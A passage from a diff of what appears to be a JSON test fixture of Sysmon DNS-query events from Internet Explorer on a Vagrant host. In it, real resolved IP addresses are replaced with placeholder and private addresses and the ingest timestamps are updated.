Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 login.msa.msidentity.com;type: 5 lgin.msa.trafficmanager.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3049,11 +3013,11 @@ }, "answers": [ { - "data": "74.119.119.150", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3061,7 +3025,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -3069,7 +3033,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { 
@@ -3077,7 +3041,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -3085,7 +3049,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -3093,23 +3057,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -3124,24 +3088,24 @@ "dis.criteo.com" ], "ip": [ - "74.119.119.150", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741232100Z", + "ingested": "2021-12-09T13:50:23.456741800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:74.119.119.150;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029315200Z'/\u003e\u003cEventRecordID\u003e90\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edis.criteo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3209,39 +3173,39 @@ "type": "CNAME" }, { - "data": "68.67.180.12", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.228", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.180.44", + "data": "89.160.20.156", "type": "A" }, { - "data": "204.13.192.141", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.230", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.178.252", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.23", + "data": "89.160.20.156", "type": "A" }, { - "data": "68.67.179.232", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3249,22 +3213,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -3281,23 +3245,16 @@ "ib.adnxs.com" ], "ip": [ - "68.67.180.12", - "68.67.179.228", - "68.67.180.44", - "204.13.192.141", - "68.67.178.230", - "68.67.178.252", - "68.67.179.23", - "68.67.179.232", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741240500Z", + "ingested": "2021-12-09T13:50:23.456747500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 
ib.anycast.adnxs.com;::ffff:68.67.180.12;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029331100Z'/\u003e\u003cEventRecordID\u003e91\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.792\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eib.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", @@ -3361,12 +3318,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { 
@@ -3382,13 +3339,13 @@ "cm.g.doubleclick.net" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741248800Z", + "ingested": "2021-12-09T13:50:23.456751700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029339900Z'/\u003e\u003cEventRecordID\u003e92\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.809\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.g.doubleclick.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3452,35 +3409,35 @@ "type": "CNAME" }, { - "data": "54.208.129.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.175.5.93", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.210.96", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.93.252.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.86.97.130", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.194.239.194", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.94.67.102", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3488,21 +3445,21 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -3518,22 +3475,16 @@ "match.adsrvr.org" ], "ip": [ - "54.208.129.24", - "54.175.5.93", - "52.86.210.96", - "3.93.252.59", - "54.86.97.130", - "34.194.239.194", - "3.94.67.102", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741257200Z", + "ingested": "2021-12-09T13:50:23.456755900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:54.208.129.24;::ffff:54.175.5.93;::ffff:52.86.210.96;::ffff:3.93.252.59;::ffff:54.86.97.130;::ffff:34.194.239.194;::ffff:3.94.67.102;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program 
Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029350100Z'/\u003e\u003cEventRecordID\u003e93\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.adsrvr.org\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-975362022.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3601,12 +3552,12 @@ "type": "CNAME" }, { - "data": "23.52.162.21", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "network": { 
@@ -3623,13 +3574,13 @@ "ssum-sec.casalemedia.com" ], "ip": [ - "23.52.162.21" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741265700Z", + "ingested": "2021-12-09T13:50:23.456760500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029358900Z'/\u003e\u003cEventRecordID\u003e94\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.821\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003essum-sec.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ssum-sec.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.029Z", 
@@ -3693,39 +3644,39 @@ "type": "CNAME" }, { - "data": "18.204.130.216", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.246.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "107.23.153.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.235.141.27", + "data": "89.160.20.156", "type": "A" }, { - "data": "3.210.79.248", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.209.146.43", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.210.64.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "18.214.161.226", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -3734,15 +3685,15 @@ } ], "resolved_ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, 
@@ -3759,22 +3710,15 @@ "protected-by.clarium.io" ], "ip": [ - "18.204.130.216", - "18.209.246.43", - "107.23.153.61", - "18.235.141.27", - "3.210.79.248", - "18.209.146.43", - "18.210.64.206", - "18.214.161.226", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741273900Z", + "ingested": "2021-12-09T13:50:23.456764900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.029369500Z'/\u003e\u003cEventRecordID\u003e95\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.828\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprotected-by.clarium.io\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 adserver-clarium-446793891.us-east-1.elb.amazonaws.com;::ffff:18.204.130.216;::ffff:18.209.246.43;::ffff:107.23.153.61;::ffff:18.235.141.27;::ffff:3.210.79.248;::ffff:18.209.146.43;::ffff:18.210.64.206;::ffff:18.214.161.226;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData 
